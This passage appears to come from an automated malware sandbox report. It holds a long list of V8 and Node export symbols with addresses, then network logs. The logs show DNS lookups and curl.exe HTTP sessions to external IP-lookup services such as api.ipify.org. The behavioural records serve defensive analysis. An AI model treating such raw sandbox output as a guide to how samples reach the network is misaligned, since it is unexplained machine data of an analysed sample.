                                                                                                                                                                                                                                    ?GetStrongCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVCrossThreadPersistentRegion@23@XZ80610x14050bb50
                                                                                                                                                                                                                                    ?GetStrongGcSubrootName@V8HeapExplorer@internal@v8@@AEAAPEBDVObject@23@@Z80620x140871570
                                                                                                                                                                                                                                    ?GetStrongPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVPersistentRegion@23@XZ80630x14050bb60
                                                                                                                                                                                                                                    ?GetStrongPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVPersistentRegion@23@XZ80640x14050bb60
                                                                                                                                                                                                                                    ?GetStrongValue@MapRef@compiler@internal@v8@@QEBA?AV?$Optional@VObjectRef@compiler@internal@v8@@@base@4@VInternalIndex@34@@Z80650x14101a420
                                                                                                                                                                                                                                    ?GetStructType@WasmModuleBuilder@wasm@internal@v8@@QEAAPEBVStructType@234@I@Z80660x140634f60
                                                                                                                                                                                                                                    ?GetStubCallContextParamIndex@Linkage@compiler@internal@v8@@SAHH@Z80670x140341520
                                                                                                                                                                                                                                    ?GetStubCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@AEBVCallInterfaceDescriptor@34@HV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@V?$Flags@W4Property@Operator@compiler@internal@v8@@E@94@W4StubCallMode@34@@Z80680x14102c290
                                                                                                                                                                                                                                    ?GetSubtypingDepth@wasm@internal@v8@@YAHPEBUWasmModule@123@I@Z80690x14062eec0
                                                                                                                                                                                                                                    ?GetSuperConstructor@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z80700x140a5e470
                                                                                                                                                                                                                                    ?GetSuperConstructor@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ80710x1410c4fa0
                                                                                                                                                                                                                                    ?GetSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ80720x14088ed20
                                                                                                                                                                                                                                    ?GetSymbol@StringsStorage@internal@v8@@AEAAPEBDVSymbol@23@@Z80730x14085e900
                                                                                                                                                                                                                                    ?GetSystemEntryName@V8HeapExplorer@internal@v8@@AEAAPEBDVHeapObject@23@@Z80740x140871730
                                                                                                                                                                                                                                    ?GetSystemEntryType@V8HeapExplorer@internal@v8@@AEAA?AW4Type@HeapEntry@23@VHeapObject@23@@Z80750x1408729a0
                                                                                                                                                                                                                                    ?GetTableType@WasmModuleBuilder@wasm@internal@v8@@QEAA?AVValueType@234@I@Z80760x140634fb0
                                                                                                                                                                                                                                    ?GetTaggedParameterSlots@CallDescriptor@compiler@internal@v8@@QEBAIXZ80770x14102c600
                                                                                                                                                                                                                                    ?GetTaggedPointerRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z80780x141256320
                                                                                                                                                                                                                                    ?GetTaggedRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@VTruncation@234@@Z80790x1412567c0
                                                                                                                                                                                                                                    ?GetTaggedSignedRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z80800x141256e50
                                                                                                                                                                                                                                    ?GetTarget@Proxy@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ80810x140bcd540
                                                                                                                                                                                                                                    ?GetTarget@TransitionsAccessor@internal@v8@@QEAA?AVMap@23@H@Z80820x140541030
                                                                                                                                                                                                                                    ?GetTargetDetails@TransitionsAccessor@internal@v8@@SA?AVPropertyDetails@23@VName@23@VMap@23@@Z80830x1405410a0
                                                                                                                                                                                                                                    ?GetTargetFromRaw@TransitionsAccessor@internal@v8@@CA?AVMap@23@VMaybeObject@23@@Z80840x1405410e0
                                                                                                                                                                                                                                    ?GetTemplateObject@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KH@Z80850x140a5e5e0
                                                                                                                                                                                                                                    ?GetTemplateObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVTemplateObjectDescriptionRef@234@AEBVSharedFunctionInfoRef@234@AEBUFeedbackSource@234@@Z80860x1410c4fb0
                                                                                                                                                                                                                                    ?GetTemporaryObjectTrackingDisabled@Debug@internal@v8@@AEBA_NXZ80870x140bbbb30
                                                                                                                                                                                                                                    ?GetThreadInWasmThreadLocalAddress@trap_handler@internal@v8@@YAPEAHXZ80880x140720100
                                                                                                                                                                                                                                    ?GetThreadLocal@Thread@base@v8@@SAPEAXH@Z80890x140ff44d0
                                                                                                                                                                                                                                    ?GetTitle@CpuProfile@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ80900x140c8a5d0
                                                                                                                                                                                                                                    ?GetToNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ80910x1400978d0
                                                                                                                                                                                                                                    ?GetToPrimitive@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z80920x140c8a630
                                                                                                                                                                                                                                    ?GetToStringTag@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z80930x140c8a640
                                                                                                                                                                                                                                    ?GetTop@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@@Z80940x140b7bdc0
                                                                                                                                                                                                                                    ?GetTopDownRoot@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@XZ80950x1402d4f40
                                                                                                                                                                                                                                    ?GetTopValidFrame@StackTraceFrameIterator@internal@v8@@QEBA?AVFrameSummary@23@XZ80960x140b7beb0
                                                                                                                                                                                                                                    ?GetTotalAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ80970x1411d30f0
                                                                                                                                                                                                                                    ?GetTotalAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ80980x1411d3150
                                                                                                                                                                                                                                    ?GetTotalFrameSlotCount@Frame@compiler@internal@v8@@QEBAHXZ80990x14057f6c0
                                                                                                                                                                                                                                    ?GetTotalInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z81000x14102ca00
                                                                                                                                                                                                                                    ?GetTraceDescriptor@TraceTraitFromInnerAddressImpl@internal@cppgc@@SA?AUTraceDescriptor@3@PEBX@Z81010x140504cd0
                                                                                                                                                                                                                                    ?GetTraceNodeId@AddressToTraceMap@internal@v8@@QEAAI_K@Z81020x14087d800
                                                                                                                                                                                                                                    ?GetTracingController@Platform@cppgc@@UEAAPEAVTracingController@v8@@XZ81030x14050bbf0
                                                                                                                                                                                                                                    ?GetTracingController@TraceEventHelper@tracing@internal@v8@@SAPEAVTracingController@4@XZ81040x1407be9e0
                                                                                                                                                                                                                                    ?GetTracingController@node@@YAPEAVTracingController@v8@@XZ81050x14010b0b0
                                                                                                                                                                                                                                    ?GetTransitionArray@TransitionsAccessor@internal@v8@@CA?AVTransitionArray@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@@Z81060x1405410f0
                                                                                                                                                                                                                                    ?GetTransitionArray@TransitionsAccessor@internal@v8@@CA?AVTransitionArray@23@PEAVIsolate@23@VMaybeObject@23@@Z81070x140541100
                                                                                                                                                                                                                                    ?GetTrivialHash@StringHasher@internal@v8@@SAIH@Z81080x140541110
                                                                                                                                                                                                                                    ?GetTurboCfgFileName@Isolate@internal@v8@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAV123@@Z81090x140b6b2d0
                                                                                                                                                                                                                                    ?GetTurboStatistics@Isolate@internal@v8@@QEAAPEAVCompilationStatistics@23@XZ81100x140b6b540
                                                                                                                                                                                                                                    ?GetType@HeapGraphEdge@v8@@QEBA?AW4Type@12@XZ81110x140582280
                                                                                                                                                                                                                                    ?GetType@HeapGraphNode@v8@@QEBA?AW4Type@12@XZ81120x140c8a650
                                                                                                                                                                                                                                    ?GetType@NodeProperties@compiler@internal@v8@@SA?AVType@234@PEBVNode@234@@Z81130x14057f6d0
                                                                                                                                                                                                                                    ?GetTypeCanonicalizer@wasm@internal@v8@@YAPEAVTypeCanonicalizer@123@XZ81140x1406d6b30
                                                                                                                                                                                                                                    ?GetTypeInfo@CFunction@v8@@QEBAPEBVCFunctionInfo@2@XZ81150x1400978d0
                                                                                                                                                                                                                                    ?GetTypeName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@H@Z81160x140658810
                                                                                                                                                                                                                                    ?GetTypeOrAny@NodeProperties@compiler@internal@v8@@SA?AVType@234@PEBVNode@234@@Z81170x141034a40
                                                                                                                                                                                                                                    ?GetTypedArrayStringTag@JSHeapBroker@compiler@internal@v8@@QEAA?AVStringRef@234@W4ElementsKind@34@@Z81180x1410b79e0
                                                                                                                                                                                                                                    ?GetTypesForSourcePositions@FeedbackNexus@internal@v8@@QEBA?AV?$vector@V?$Handle@VString@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VString@internal@v8@@@internal@v8@@@std@@@std@@I@Z81190x1409aba00
                                                                                                                                                                                                                                    ?GetUnboundModuleScript@Module@v8@@QEAA?AV?$Local@VUnboundModuleScript@v8@@@2@XZ81200x140c8a660
                                                                                                                                                                                                                                    ?GetUnboundScript@Function@v8@@QEBA?AV?$MaybeLocal@VUnboundScript@v8@@@2@XZ81210x140c8a770
                                                                                                                                                                                                                                    ?GetUnboundScript@Script@v8@@QEAA?AV?$Local@VUnboundScript@v8@@@2@XZ81220x140c8a840
                                                                                                                                                                                                                                    ?GetUnresolvedPrivateNameTail@ClassScope@internal@v8@@QEAA?AVIterator@?$ThreadedListBase@VVariableProxy@internal@v8@@UEmptyBase@base@3@UUnresolvedNext@123@@base@3@XZ81230x140c652c0
                                                                                                                                                                                                                                    ?GetUnscopables@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z81240x140c8a8c0
                                                                                                                                                                                                                                    ?GetUnsignedImmediateOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z81250x140a53b90
                                                                                                                                                                                                                                    ?GetUnsignedOperand@BytecodeArrayIterator@interpreter@internal@v8@@AEBAIHW4OperandType@234@@Z81260x140a53bd0
                                                                                                                                                                                                                                    ?GetUnwindInfo@Assembler@internal@v8@@QEBA?AVBuiltinUnwindInfo@win64_unwindinfo@23@XZ81270x1405fe170
                                                                                                                                                                                                                                    ?GetUsePtr@Node@compiler@internal@v8@@AEAAPEAUUse@1234@H@Z81280x14057f6e0
                                                                                                                                                                                                                                    ?GetUserTime@OS@base@v8@@SAHPEAI0@Z81290x140ff44e0
                                                                                                                                                                                                                                    ?GetVFormatted@StringsStorage@internal@v8@@AEAAPEBDPEBDPEAD@Z81300x14085ea00
                                                                                                                                                                                                                                    ?GetValue@Descriptor@internal@v8@@QEBA?AVMaybeObjectHandle@23@XZ81310x140541120
                                                                                                                                                                                                                                    ?GetValue@MapUpdater@internal@v8@@AEBA?AVObject@23@VInternalIndex@23@@Z81320x14092fbc0
                                                                                                                                                                                                                                    ?GetValueInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z81330x14057f710
                                                                                                                                                                                                                                    ?GetValueInput@NodeProperties@compiler@internal@v8@@SAPEBVNode@234@PEBV5234@H@Z81340x14057f710
                                                                                                                                                                                                                                    ?GetValuesNodeFromCache@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@PEAPEAV5234@_KVSparseInputMask@234@@Z81350x1410e02d0
                                                                                                                                                                                                                                    ?GetVariableMode@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4VariableMode@23@W4Kind@ClassLiteralProperty@23@@Z81360x14088f090
                                                                                                                                                                                                                                    ?GetVersion@V8@v8@@SAPEBDXZ81370x14061dde0
                                                                                                                                                                                                                                    ?GetVersion@Version@internal@v8@@SAPEBDXZ81380x14061dde0
                                                                                                                                                                                                                                    ?GetVirtualRegister@InstructionSelector@compiler@internal@v8@@QEAAHPEBVNode@234@@Z81390x14105ded0
                                                                                                                                                                                                                                    ?GetVirtualRegistersForTesting@InstructionSelector@compiler@internal@v8@@QEBA?BV?$map@IHU?$less@I@std@@V?$allocator@U?$pair@$$CBIH@std@@@2@@std@@XZ81400x14105df20
                                                                                                                                                                                                                                    ?GetVisitorId@Map@internal@v8@@SA?AW4VisitorId@23@V123@@Z81410x140929de0
                                                                                                                                                                                                                                    ?GetWasmCallDescriptor@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@W4WasmCallKind@123@_N@Z81420x141084070
                                                                                                                                                                                                                                    ?GetWasmCodeManager@wasm@internal@v8@@YAPEAVWasmCodeManager@123@XZ81430x14064e160
                                                                                                                                                                                                                                    ?GetWasmEngine@wasm@internal@v8@@YAPEAVWasmEngine@123@XZ81440x14064e170
                                                                                                                                                                                                                                    ?GetWasmFunctionIndex@Message@v8@@QEBAHXZ81450x140c8a8d0
                                                                                                                                                                                                                                    ?GetWasmInternalFunction@WasmInstanceObject@internal@v8@@SA?AV?$MaybeHandle@VWasmInternalFunction@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z81460x1406261a0
                                                                                                                                                                                                                                    ?GetWasmModuleFromId@Delegate@ValueDeserializer@v8@@UEAA?AV?$MaybeLocal@VWasmModuleObject@v8@@@3@PEAVIsolate@3@I@Z81470x140c895a0
                                                                                                                                                                                                                                    ?GetWasmModuleTransferId@Delegate@ValueSerializer@v8@@UEAA?AV?$Maybe@I@3@PEAVIsolate@3@V?$Local@VWasmModuleObject@v8@@@3@@Z81480x140c8aac0
                                                                                                                                                                                                                                    ?GetWasmSourceMap@NativeModule@wasm@internal@v8@@QEBAPEAVWasmModuleSourceMap@234@XZ81490x140439630
                                                                                                                                                                                                                                    ?GetWeakCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVCrossThreadPersistentRegion@23@XZ81500x14050bb70
                                                                                                                                                                                                                                    ?GetWeakCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVCrossThreadPersistentRegion@23@XZ81510x14050bb70
                                                                                                                                                                                                                                    ?GetWeakPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVPersistentRegion@23@XZ81520x14050bb80
                                                                                                                                                                                                                                    ?GetWeakPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVPersistentRegion@23@XZ81530x14050bb80
                                                                                                                                                                                                                                    ?GetWireBytesRef@CompiledWasmModule@v8@@QEAA?AV?$MemorySpan@$$CBE@2@XZ81540x140c8aad0
                                                                                                                                                                                                                                    ?GetWireBytesStorage@CompilationState@wasm@internal@v8@@QEBA?AV?$shared_ptr@VWireBytesStorage@wasm@internal@v8@@@std@@XZ81550x140693ce0
                                                                                                                                                                                                                                    ?GetWireFormatVersion@ValueDeserializer@v8@@QEBAIXZ81560x140c8ab80
                                                                                                                                                                                                                                    ?GetWord32RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z81570x141257310
                                                                                                                                                                                                                                    ?GetWord64RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z81580x141257c30
                                                                                                                                                                                                                                    ?GetWorkingSpace@StateValuesCache@compiler@internal@v8@@AEAAPEAV?$array@PEAVNode@compiler@internal@v8@@$07@std@@_K@Z81590x1410e0470
                                                                                                                                                                                                                                    ?GetWrappedFunction@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@V?$Handle@VFixedArray@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@AEBUScriptDetails@23@PEAVAlignedCachedData@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@ScriptCompiler@3@@Z81600x140c074d0
                                                                                                                                                                                                                                    ?GetWriteBarrierType@WriteBarrier@internal@cppgc@@SA?AW4Type@123@PEBX0AEAUParams@123@@Z81610x140541130
                                                                                                                                                                                                                                    ?GetWriteBarrierType@WriteBarrier@internal@cppgc@@SA?AW4Type@123@PEBXAEAUParams@123@@Z81620x140541170
                                                                                                                                                                                                                                    ?GetterCallbackEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z81630x1400971a0
                                                                                                                                                                                                                                    ?GetterCallbackEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z81640x140863b00
                                                                                                                                                                                                                                    ?GiveBack@IndexGenerator@internal@v8@@QEAAX_K@Z81650x140af4cb0
                                                                                                                                                                                                                                    ?Glb@BitsetType@compiler@internal@v8@@SA_KNN@Z81660x141027920
                                                                                                                                                                                                                                    ?Global@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ81670x140c8ab90
                                                                                                                                                                                                                                    ?Global@DebugEvaluate@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4EvaluateGlobalMode@debug@3@W4REPLMode@23@@Z81680x140bcec90
                                                                                                                                                                                                                                    ?Global@DebugEvaluate@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@W4EvaluateGlobalMode@debug@3@W4REPLMode@23@@Z81690x140bcee70
                                                                                                                                                                                                                                    ?GlobalConstantFor@Factory@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z81700x140b23ee0
                                                                                                                                                                                                                                    ?GlobalDictionaryPrint@GlobalDictionary@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z81710x140b8cde0
                                                                                                                                                                                                                                    ?GlobalIndex@AsmJsScanner@internal@v8@@SA_KH@Z81720x140734480
                                                                                                                                                                                                                                    ?GlobalSizeOfObjects@Heap@internal@v8@@QEAA_KXZ81730x140b09190
                                                                                                                                                                                                                                    ?GlobalTearDown@WasmEngine@wasm@internal@v8@@SAXXZ81740x14064e180
                                                                                                                                                                                                                                    ?GlobalizeReference@api_internal@v8@@YAPEA_KPEAVIsolate@internal@2@PEA_K@Z81750x140c8ad20
                                                                                                                                                                                                                                    ?GlobalizeTracedReference@internal@v8@@YAPEA_KPEAVIsolate@12@PEA_K1W4GlobalHandleStoreMode@12@@Z81760x140c8ad50
                                                                                                                                                                                                                                    ?GoTo@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z81770x140855200
                                                                                                                                                                                                                                    ?GoTo@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z81780x140571810
                                                                                                                                                                                                                                    ?GoToEnd@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXXZ81790x140a52fa0
                                                                                                                                                                                                                                    ?GoToIndex@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXH@Z81800x140a52fe0
                                                                                                                                                                                                                                    ?GoToStart@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXXZ81810x140a53010
                                                                                                                                                                                                                                    ?Goto@CodeAssembler@compiler@internal@v8@@QEAAXPEAVCodeAssemblerLabel@234@@Z81820x1410ab920
                                                                                                                                                                                                                                    ?Goto@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVRawMachineLabel@234@@Z81830x1412192f0
                                                                                                                                                                                                                                    ?GotoIf@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@@Z81840x1410ab960
                                                                                                                                                                                                                                    ?GotoIfNot@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@@Z81850x1410aba60
                                                                                                                                                                                                                                    ?Granularity@ObjectStartBitmap@internal@cppgc@@SA_KXZ81860x1400ce390
                                                                                                                                                                                                                                    ?GreaterThan@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z81870x1410c5090
                                                                                                                                                                                                                                    ?GreaterThanOrEqual@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z81880x1410c5150
                                                                                                                                                                                                                                    ?Grow@?$SmallOrderedHashTable@VSmallOrderedHashMap@internal@v8@@@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@@Z81890x1408fa800
                                                                                                                                                                                                                                    ?Grow@?$SmallOrderedHashTable@VSmallOrderedHashSet@internal@v8@@@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@@Z81900x1408fa870
                                                                                                                                                                                                                                    ?Grow@NewSpace@internal@v8@@QEAAXXZ81910x140ab80e0
                                                                                                                                                                                                                                    ?Grow@ValueNumberingReducer@compiler@internal@v8@@AEAAXXZ81920x14120d5e0
                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.104083061 CEST4976580192.168.11.20104.26.13.205
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.238078117 CEST8049765104.26.13.205192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.238291025 CEST4976580192.168.11.20104.26.13.205
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.238804102 CEST4976580192.168.11.20104.26.13.205
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.366684914 CEST8049765104.26.13.205192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.425390005 CEST8049765104.26.13.205192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.426103115 CEST4976580192.168.11.20104.26.13.205
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.562304020 CEST8049765104.26.13.205192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.562545061 CEST4976580192.168.11.20104.26.13.205
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.988617897 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.988723993 CEST4434976634.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.988991976 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.989397049 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.989470005 CEST4434976634.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.267060995 CEST4434976634.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.267755985 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.267770052 CEST4434976634.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.269504070 CEST4434976634.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.269715071 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.271226883 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.271310091 CEST4434976634.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.271429062 CEST4434976634.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.271501064 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:46.272424936 CEST49766443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.793395996 CEST4976780192.168.11.20172.67.74.152
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.924987078 CEST8049767172.67.74.152192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.925388098 CEST4976780192.168.11.20172.67.74.152
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.933733940 CEST4976780192.168.11.20172.67.74.152
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:13.062642097 CEST8049767172.67.74.152192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:13.112426996 CEST8049767172.67.74.152192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:13.113095999 CEST4976780192.168.11.20172.67.74.152
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:13.241692066 CEST8049767172.67.74.152192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:13.241988897 CEST4976780192.168.11.20172.67.74.152
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.683871031 CEST49768443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.683975935 CEST4434976834.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.684096098 CEST49768443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.684541941 CEST49768443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.684604883 CEST4434976834.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.959712982 CEST4434976834.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.960352898 CEST49768443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.960433960 CEST4434976834.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.965065002 CEST4434976834.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.965286016 CEST49768443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.966995001 CEST49768443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.967230082 CEST4434976834.160.111.145192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:48.967461109 CEST49768443192.168.11.2034.160.111.145
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:11.920012951 CEST6277153192.168.11.201.1.1.1
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.047817945 CEST53627711.1.1.1192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.513279915 CEST5154253192.168.11.201.1.1.1
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.986396074 CEST53515421.1.1.1192.168.11.20
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.615955114 CEST6440753192.168.11.201.1.1.1
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.745590925 CEST53644071.1.1.1192.168.11.20
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:11.920012951 CEST192.168.11.201.1.1.10xa09fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.513279915 CEST192.168.11.201.1.1.10x547fStandard query (0)www.myexternalip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.615955114 CEST192.168.11.201.1.1.10xf738Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.047817945 CEST1.1.1.1192.168.11.200xa09fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.047817945 CEST1.1.1.1192.168.11.200xa09fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:12.047817945 CEST1.1.1.1192.168.11.200xa09fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:22:45.986396074 CEST1.1.1.1192.168.11.200x547fNo error (0)www.myexternalip.com34.160.111.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.745590925 CEST1.1.1.1192.168.11.200xf738No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.745590925 CEST1.1.1.1192.168.11.200xf738No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 1, 2024 18:23:12.745590925 CEST1.1.1.1192.168.11.200xf738No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    • api.ipify.org
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.11.2049765104.26.13.205804940C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
